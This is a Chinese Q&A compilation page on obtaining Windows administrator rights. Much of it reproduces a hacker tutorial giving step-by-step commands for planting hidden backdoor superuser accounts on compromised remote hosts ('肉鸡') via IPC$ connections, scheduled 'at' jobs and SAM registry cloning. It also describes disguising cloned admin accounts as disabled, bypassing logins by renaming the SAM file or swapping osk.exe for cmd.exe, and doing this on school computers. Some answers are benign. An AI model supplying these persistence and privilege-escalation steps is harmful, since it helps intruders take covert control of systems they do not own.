点击“开始”→“运行”,输入“CMD”运行“命令提示符”。
接着输入“net user zeng$ 123456 /add”,回车,成功后会显示“命令成功完成”。记住要空格这里“123456 /add”不空格会不成功。就是在那个憋的前面空格一下就行了。如果输错了,也不会有事的,因为系统读取不出来。
接着输入“net localgroup administrators zeng$ /add”回车,这样就利用“命令提示符”成功得建立了一个用户名为“zeng$”,密码为“123456”的简单“隐藏账户”,并且把该隐藏账户提升为了管理员权限。
在“命令提示符”中输入查看系统账户的命令“net user”,回车后会显示当前系统中存在的账户。从返回的结果中可以看到刚才建立的“zeng$”这个账户并不存在,但是在控制面板和系统登入时还是可以显示到此用户的,所以还用一个步骤,就是让这个用户在控制面板以及系统登入的页面里消失。
你说的隐藏是在登陆的时候看不到还是进行控制面板里也看不到 如果是第二种.. 那可以肯定的告诉你.. 不行..
第一种的话. 系统默人管理员为administrator
当用户再新建一个管理员帐号时
再开机,到登陆界面就会只显示用户新建的那个用户
而administrator这个用户会被隐藏
如果要使用这个用户登陆
需要按CTRL+ALT+DEL切换到经典登陆模式
然后手动输入用户名
administrator
再输入密码登陆
一、如何在图形界面建立隐藏的超级用户
图形界面下适用本地或开3389终端服务的肉鸡上。上面我提到的那位作者说的方法很好,但是较为复杂,还要用到psuexe(让程序以系统用户身份运行的程序),如果在肉鸡上的话还要上传psuexe。我说的这个方法将不用到psuexe这个程序。因为windows2000有两个注册表编辑器:regeditexe和regedt32exe。XP中regeditexe和regedt32exe实为一个程序,修改键值的权限时在右键中点“权限”来修改。对regeditexe我想大家都很熟悉,但却不能对注册表的项键设置权限,而regedt32exe最大的优点就是能够对注册表的项键设置权限。nt/2000/xp的帐户信息都在注册表的HKEY_LOCAL_MACHINE\SAM\SAM键下,但是除了系统用户SYSTEM外,其它用户都无权查看到里面的信息,因此我首先用regedt32exe对SAM键为我设置为“完全控制”权限。这样就可以对SAM键内的信息进行读写了了。具体步聚如下:
1、假设我们是以超级用户administrator登录到开有终端服务的肉鸡上的,首先在命令行下或帐户管理器中建立一个帐户:hacker$,这里我在命令行下建立这个帐户
net user hacker$ 1234 /add
2、在开始/运行中输入:regedt32exe并回车来运行regedt32exe。
3、点“权限”以后会弹出窗口
点添加将我登录时的帐户添加到安全栏内,这里我是以administrator的身份登录的,所以我就将administrator加入,并设置权限为“完全控制"。这里需要说明一下:最好是添加你登录的帐户或帐户所在的组,切莫修改原有的帐户或组,否则将会带来一系列不必要的问题。等隐藏超级用户建好以,再来这里将你添加的帐户删除即可。
4、再点“开始”→“运行”并输入"regeditexe" 回车,启动注册表编辑器regeditexe。
打开键:HKEY_LOCAL_MAICHINE\SAM\SAM\Domains\account\user\names\hacker$"
5、将项hacker$、00000409、000001F4导出为hackerreg、409reg、1f4reg,用记事本分别打这几个导出的文件进行编辑,将超级用户对应的项000001F4下的键"F"的值复制,并覆盖hacker$对应的项00000409下的键"F"的值,然后再将00000409reg与hackerreg合并。
6、在命令行下执行net user hacker$ /del将用户hacker$删除:net user hacker$ /del
7、在regeditexe的窗口内按F5刷新,然后打文件-导入注册表文件将修改好的hackerreg导入注册表即可
8、到此,隐藏的超级用户hacker$已经建好了,然后关闭regeditexe。在regedt32exe窗口内把HKEY_LOCAL_MACHINE\SAM\SAM键权限改回原来的样子(只要删除添加的帐户administrator即可)。
9、注意:隐藏的超级用户建好后,在帐户管理器看不到hacker$这个用户,在命令行用“net user”命令也看不到,但是超级用户建立以后,就不能再改密码了,如果用net user命令来改hacker$的密码的话,那么在帐户管理器中将又会看这个隐藏的超级用户了,而且不能删除。 <br>
如何在命令行下远程建立隐藏的超级用户
在这里将用at的命令,因为用at产生的计划任务是以系统身份运行的,所以也用不到psuexe程序。为了能够使用at命令,肉鸡必须开有schedule的服务,如果没有开启,可用流光里带的工具netsvcexe或scexe来远程启动,当然其方法也可以,只要能启动schedule服务就行。
对于命令行方式,你可以采用各种连接方式,如用SQLexec连接MSSQL的1433端口,也可以用telnet服务,只要以你能得到一个cmdshell,并且有运行at命令的权限就可以。
1、首先找到一台肉鸡,至于如何来找那不是我这里所说的话题。这里先假设找到一台超级用户为administrator,密码为12345678的肉鸡,现在我们开始在命令行下远程为它建立隐藏的超级用户。<br>
2、先与肉鸡建立连接,命令为: net use IPipc$ "12345678" /user:"administrator
3、用at命令在肉鸡上建立一个用户(如果at服务没有启动,可用小榕的netsvcexe或scexe来远程启动):at IP 12:51
c:\winnt\system32\netexe user hacker$ 1234 /add
建立这个加有$符的用户名,是因为加有$符后,命令行下用net user将不显示这个用户,但在帐户管理器却能看到这个用户。
4、同样用at命令导出HKEY_LOCAL_MACHINE\sam\sam\Domains\account\users下键值:at IP 12:55
c:\winnt\regeditexe /e hackerreg HKEY_LOCAL_MACHINE\SAM\SAM\Domains\account\users\
/e 是regeditexe的参数,在_LOCAL_MACHINE\SAM\SAM\Domains\account\users\这个键的一定要以\结尾。必要的情况下可以用引号将"c:\winnt\regeditexe /e hackerreg HKEY_LOCAL_MACHINE\SAM\SAM\Domains\account\users\"引起来。
5、将肉鸡上的hackerreg下载到本机上用记事本打开进行编辑命令为:copy IP
c:\hackerreg
修改的方法图形界中已经介绍过了,这里就不作介绍了。
6、再将编辑好的hackerreg拷回肉鸡上 copy c:\hackerreg IP
7、查看肉鸡时间:net time IP 然后用at命令将用户hacker$删除:
at IP 13:40 net user hacker$ /del
8、验证hacker$是否删除:用
net use IP /del 断开与肉鸡的连接。
net use IP "1234" /user:"hacker$" 用帐户hacker$与肉鸡连接,不能连接说明已删除。
9、再与肉鸡建立连接:net use IP "12345678" /user:"administrator"
再取得肉鸡时间,用at命令将拷回肉鸡的hacker1reg导入肉鸡注册表:
at IP 13:41 c:\winnt\regeditexe /s hacker1reg
regeditexe的参数/s是指安静模式。
10、再验证hacker$是否已建立,方法同上面验证hacker$是否被删除一样。
11、再验证用户hacker$是否有读、写、删的权限,如果不放心,你还可验证是否能建立其它帐户。
12、通过11可以断定用户hacker$具有超级用户权限,因为最初我用at命令建立它的时候是一个普通用户,而现在却具有远程读、写、删的权限。
三、如果肉鸡没有开3389终端服务,而我又不想用命令行,怎么办?
这种情况下,你也可以用界面方式来远程为肉鸡建立隐藏的超级用户。因为regeditexe、regedt32exe都有连接网络注册表的功能,你可以用regedt32exe来为远程主机的注册表项设置权限,用regeditexe来编辑远程注册表。帐户管理器也有一项连另一台计算机的功能,你可以用帐户管理器为远程主机建立和删除帐户。具体步聚与上面介绍的相似,我就不多说了,只它的速度实在是令人难以忍受。
但是这里有两个前提:1、先用net use \\肉鸡ip\ipc$ "密码" /user:"超级用户名"来与远程主机建立连接以后,才能用regeditexe regedt32exe及帐户管理器与远程主机连接。
2、远程主机必须开启远程注册表服务(没有开启的话,你也可以远程开启,因为你有超级用户的密码了)。
四、利用被禁用的帐户建立隐藏的超级用户:
我们可以用肉鸡上被禁止的用户来建立隐藏的超组用户方法如下:
1.想办法查看有哪些用户被细心的管理员禁止,一般情况下,有些管理员出于安全考虑,通常会将guest禁用,当然了会禁用其它用户。在图形界面下,非常容易,只要在帐户管理器中就可以看到被禁用的帐户上有一个红叉;而在命令行下,我还没有想到好的办法,只能在命令行下用命令:"net user 用户名"一个一个来查看用户是否被禁用。
2.在这里,我们假设用户hacker被管理员禁用。首先,我先用小榕的超组用户克隆程序CAexe,将被禁用的用户hacker 克隆成超级用户(克隆之后,被禁用的用户hacker就会自动被激活了): CAEXE \\肉鸡ip Administrator 超级用户密码 hacher hacher密码。
3.如果你现在一个cmdshell,如利用telnet服务或SQLEXEC连接肉鸡的msSQL的默认端口1433得到的shell都可以,这时你只要输入命令:
net user hacker /active:no 这样用户hacker就被禁用了(至少表面上是这样的),当然你也可以将用户hacher换成其它的被禁用的用户。
4.这时如果你在图形界面下看帐户管理器中的用户时,会发现用户hacker被禁用了,但事实上是这样的吗?你用这个被禁用的用户连接一下肉鸡看看是否能连上?用命令:net user \\肉鸡ip\ipc$ "hacker密码" /user:"hacker" 连一连看看。我可以告诉大家,经过我多次试验,次次都能成功,而且还是超级用户权限。
5.如果没有cmdshell怎么办?你可以我上面介绍的at命令来禁用用户hacker;命令格式:at \\肉鸡ip 时间 net user hacker /active:no
6.原理:具体的高深的原理我也说不上来,我只能从最简单的说。你先在图形界面下在帐户管理器中禁用一下超级用户administrator看看,肯定会弹出一对话框,并禁止你继续禁用超级用户administrator,同样,因为在克隆时,hacker在注册表的"F"键被超级用户administrator在注册表的"F"键所替代,因而hacker就具有了超级用户的权限了,但是由于hacker在注册表内"C"健还是原来的"C"键,所以hacker还是会被禁用,但是它的超级用户权限却不会被禁用,因此被禁用的用户hacker还是可以连接肉鸡,而且还具有超级用户的权限。具体我也说不明白,大家权且这么理解吧。 <br>
五、注意的几点事项:
1、隐藏的超级用户建立以后,在帐户管理器中和命令行下均看不到这个用户,但这个用户却存在。
2、隐藏的超级用户建立以后,就不能再修改密码了,因为一旦修改密码,这个隐藏的超级用户就会暴露在帐户管理器中,而且不能删除。
3、如在本机上试验时,最好用系统自带的备份工具先备份好本机的“系统状态”主要是注册表的备份,因为本人做试验时,曾出现过帐户管理器中看不到任何用户,组中也看不到任何组的现象,但它们却存在。幸好我有备份,呵呵。SAM键是毕竟系统最敏感的部位。
4、本方法在2000/XP上测试通过,未在NT上测试。本方法仅供研究,请勿将本方法用于破坏上,利用本方法造成严重后果者,由使用者负责,本人概不负责
开机按f8,进入命令行模式,进入c:\windows\system32\config这个目录,目录里面有个叫sam的没有扩展名的的文件存储的就是管理员密码,把这个文件改名,第二次重启后,系统会自动重建这个文件,所有的密码都设置为没有。当然管理员密码也就清除了,干完了你想要干的事情后,进入dos恢复这个文件,密码就恢复了,什么都不影响。当然可以进入管理员的界面把自己权限提升,但是这个比较容易发现。这些都是建立在xp系统前提下。服务器操作系统弄个需要更高级的权限。或者制作usb启动盘,更改这个文件,推荐用老毛头的winpe操作系统制作。
补充,仅仅是改sam的文件名是不会出错的,我验证过不知道多少次了,一般都是别人忘记密码,我清除密码用这个方法,完事了以后把这个文件恢复回来就ok了!~
问题一:如何获得计算机管理权限 下面列举两种方法。
方法一:从系统管理中启用系统管理员 Administrator 账户。
打开开始菜单,右击“计算机”,选择“管郸”。
在“计算机管理”窗口,依次定位到“本地用户和组->用户”。单击展开“用户”项。
在右边的细节窗口中,右击“Administrator”,选择“属性”。
默认状态下,Administrator 属性窗口中“账户已禁用”项是勾选着的。我们需要取消其勾选,然后按“确定”保存更改。
方法二:使用命令启用系统管理员 Administrator 账户。
单击开始按钮,在开始搜索框中键入 cmdexe。弹出对应的程序后,右击,选择“以管理员身份运行”。
命令窗口打开后,键入 net user administrator /active:yes。输完后按一下回车键。
看到“命令成功完成”信息即表明系统管理员 Administrator 账户已启用
问题二:如何获得文件夹权限 方法:
1首先找到没有权限的文件夹,右键单击该文件夹选择属性。
2在属性里选择安全选项卡。
3鼠标左键单击安全选项卡里的编辑。
4在弹出的对话框里选择添加进入到选择用户或组。
5在选择用户或组里点左下角的高级。
6在新弹出的高级的选择用户或组里点击右方的立即查找,然后下方搜索结果会出现电脑上所有的用户或组。
7在下方搜索结果中找到和选择Everyone,再点击确定。
8这样会回到之前的选择用户或组里,这时可以看到对象里有了Everyone,再点击确定。点击确定后可以看到文件夹的权限里有了Everyone。
9选中Everyone,把下方的允许完全控制打上勾,再点击应用,再点击确定。最后再在之前的属性安全那里点击确定就完成操作,这时就获得了该文件夹的操作权限。
问题三:如何获得系统管理员的权限 将你现在的帐户提升为管理员才行
方法:右键“我的电脑”→在选项中选择“管理”→在计算机管理窗口中依次展开 系统工具→本地用户和组→单击“组”→右边框里面有一个Administrators这样的名称的组是管理员组→双击Administrators→按一下左下角的添加→然后按亥级→单击右边的立即查找按钮→看到下面框中有你刚建的帐户名选中它然后按确定→看到框里有了你刚才的帐户名再按确定→最后一定要按应用就行了。
问题四:如何获得管理员权限 在学校的电脑里建立一个隐藏的超级帐户:
1、在开始/运行中输入:regedt32exe并回车来运行regedt32exe。
2、点“权限”以后会弹出窗口点添加将我登录时的帐户添加到安全栏内,这里我是以administrator的身份登录的,所以我就将administrator加入,并设置权限为“完全控制。这里需要说明一下:最好是添加你登录的帐户或帐户所在的组,切莫修改原有的帐户或组,否则将会带来一系列不必要的问题。等隐藏超级用户建好以,再来这里将你添加的帐户删除即可。
3、再点“开始”→“运行”并输入regeditexe 回车,启动注册表编辑器regeditexe。 打开键:HKEY_LOCAL_MAICHINE\SAM\SAM\Domains\account\user\names\hacker$
4、将项hacker$、00000409、000001F4导出为hackerreg、409reg、1f4reg,用记事本分别打这几个导出的文件进行编辑,将超级用户对应的项000001F4下的键F的值复制,并覆盖hacker$对应的项00000409下的键F的值,然后再将00000409reg与hackerreg合并。
5、在命令行下执行net user hacker$ /del将用户hacker$删除:net user hacker$ /del
6、在regeditexe的窗口内按F5刷新,然后打文件-导入注册表文件将修改好的hackerreg导入注册表即可
7、到此,隐藏的超级用户hacker$已经建好了,然后关闭regeditexe。在regedt32exe窗口内把HKEY_LOCAL_MACHINE\SAM\SAM键权限改回原来的样子(只要删除添加的帐户administrator即可)。
8、注意:隐藏的超级用户建好后,在帐户管理器看不到hacker$这个用户,在命令行用“net user”命令也看不到,但是超级用户建立以后,就不能再改密码了,如果用net user命令来改hacker$的密码的话,那么在帐户管理器中将又会看这个隐藏的超级用户了,而且不能删除。
问题五:怎么取得Administrator权限 不知道你的系统是XP还是WIN7……
XP的话如下:
打开控制面板/性能与维护/管理工具/机算机管理/双击计算机管理,再双击“本地用户和组”然后单击“用户”,将右边的显示了系统账户和你创建的账户,将除Administrator以外的账户停用,禁用后的帐户前应该有个红色的叉号。注销或重启,这样就可以以“Administrator”帐户登录了。你还可以在控制面板-用户和账户,将你常用的账户提升为管理员(先取消禁用),这样平时用时就跟Administrator一样了。
WIN7:右键我的电脑,点击计算机管理,其他跟XP就差不多了。
问题六:怎样获得自己电脑的管理员权限 开始控制面板然后用户账户设置就好了如有问题可以再试一下百度
问题七:手机怎样获得root权限 你好,
只要是使用安卓系统的手机都可以进行ROOT,
下面我教你具体步骤:
1:打开手机上开发选项中的USB调试功能,
(有的手机需要多次点击版本信息,才可以出现开发中的USB调试),
2:使用原装的数据线将手机与电脑进行连接,
3:打开电脑上的“应用宝”功能,会迅速的识别你的手机机型,
并且自动的安装相应的手机驱动,连接成功。
4:使用备份资料将手机中的重要信息或文件进行备份,
防止在ROOT的过程中发生丢失的现象。
5:进入“工具箱”点击“一键ROOT功能”,等待3~5分钟,
就可以出现提示ROOT成功了,
6:成功后,就可以随意的使用文件管理功能对手机内的所有文件进行删除或者移动。
希望能帮到你。
问题八:怎样获取管理员权限 1、在开始/运行中输入:regedt32exe并回车来运行regedt32exe。
2、点“权限”以后会弹出窗口点添加将我登录时的帐户添加到安全栏内,这里我是以administrator的身份登录的,所以我就将administrator加入,并设置权限为“完全控制。这里需要说明一下:最好是添加你登录的帐户或帐户所在的组,切莫修改原有的帐户或组,否则将会带来一系列不必要的问题。等隐藏超级用户建好以,再来这里将你添加的帐户删除即可。
3、再点“开始”→“运行”并输入regeditexe 回车,启动注册表编辑器regeditexe。 打开键:HKEY_LOCAL_MAICHINE\SAM\SAM\Domains\account\user\names\hacker$
4、将项hacker$、00000409、000001F4导出为hackerreg、409reg、1f4reg,用记事本分别打这几个导出的文件进行编辑,将超级用户对应的项000001F4下的键F的值复制,并覆盖hacker$对应的项00000409下的键F的值,然后再将00000409reg与hackerreg合并。
5、在命令行下执行net user hacker$ /del将用户hacker$删除:net user hacker$ /del
6、在regeditexe的窗口内按F5刷新,然后打文件-导入注册表文件将修改好的hackerreg导入注册表即可
7、到此,隐藏的超级用户hacker$已经建好了,然后关闭regeditexe。在regedt32exe窗口内把HKEY_LOCAL_MACHINE\SAM\SAM键权限改回原来的样子(只要删除添加的帐户administrator即可)。
8、注意:隐藏的超级用户建好后,在帐户管理器看不到hacker$这个用户,在命令行用“net user”命令也看不到,但是超级用户建立以后,就不能再改密码了,如果用net user命令来改hacker$的密码的话,那么在帐户管理器中将又会看这个隐藏的超级用户了,而且不能删除。
问题九:怎样获得管理员权限? 由于管理员已经被禁用,现在用的是标准用户。所以当右击“命令提示符”,选择“以管理员身份运行”时,会提示拒绝访问,因为没有权限~真正可行的方法是用光盘或U盘启动计算机进入PE系统或支持NTFS的DOS,把System32目录下的cmdexe和oskexe复制出来,然后把cmdexe改名为oskexe再放到System32下,替换原有的oskexe。由于oskexe是Vista的屏幕键盘,而cmdexe是系统命令行,用cmdexe替换oskexe后当你打开屏幕键盘时实际打开的则是命令行~重启系统,在用户登录界面点击左下角的轻松访问中心,把屏幕键盘前面的勾打上,则会启动命令行,并且是以系统内置的最高权限打开的,在里面输入“net user administrator /active:yes”(不含引号)后回车,就能启用administrator账户,或者可以用“net user abc 123 /add”添加密码是123的帐户abc,再用“net localgroup administrators abc/add”将账号abc提升为管理员~一切搞定后别忘了把oskexe复制回System32目录~
问题十:怎么获得c盘权限 5分 获取C盘权限的方法:
1、文件夹点击右键,查看属性。再点安全--高级--所有者
2、点编辑--其他用户或组,在输入选择的对象名称里面输入自己的用户名,再确定
3、选择替换子容器和对象的所有者。
4、点确定,会弹出一个对话框,继续点确定,这样就拥有了这个文件夹的所有权。
注意:不勾选“替换子容器和对象的所有者”,就只有这个文件夹的所有权,不会取得子文件夹和子文件夹里面所有文件的所有权。
5、再点权限→编辑(更改权限)--添加,把自己的用户名填入,点确定。
6、再点击你的用户名--编辑,再勾选“完全控制/允许”,确定。
7、再勾选“把使用可从此对象继承的权限替换所有后代上现有的可继承权限”。然后点应用、确定、确定、再确定。这样就完全拥有了对这个文件夹的所有权限。
欢迎分享,转载请注明来源:品搜搜测评网